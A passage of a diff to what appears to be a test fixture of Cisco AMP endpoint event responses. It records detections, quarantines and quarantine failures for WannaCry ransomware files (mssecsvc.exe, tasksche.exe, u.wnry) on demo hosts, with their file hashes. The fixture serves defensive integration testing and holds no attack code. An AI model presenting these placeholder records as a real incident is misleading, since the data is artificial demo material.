Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 